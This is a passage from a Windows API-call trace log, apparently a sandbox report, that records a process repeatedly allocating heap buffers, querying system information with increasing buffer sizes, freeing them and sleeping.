ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.783] Sleep (dwMilliseconds=0x110) [0210.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.801] Sleep (dwMilliseconds=0x110) [0210.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.813] Sleep (dwMilliseconds=0x110) [0210.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.832] Sleep (dwMilliseconds=0x110) [0210.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.865] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.865] Sleep (dwMilliseconds=0x110) [0210.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.880] Sleep (dwMilliseconds=0x110) [0210.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.986] Sleep (dwMilliseconds=0x110) [0211.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.161] Sleep (dwMilliseconds=0x110) [0211.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.510] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.510] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.511] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.512] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.515] Sleep (dwMilliseconds=0x110) [0211.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.735] Sleep (dwMilliseconds=0x110) [0211.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.819] Sleep (dwMilliseconds=0x110) [0211.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.863] Sleep (dwMilliseconds=0x110) [0211.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0211.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0211.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0211.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0211.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0211.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0211.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0211.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0211.894] Sleep (dwMilliseconds=0x110) [0211.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0212.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0212.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0212.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.004] Sleep (dwMilliseconds=0x110) [0212.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0212.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0212.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0212.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0212.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0212.037] 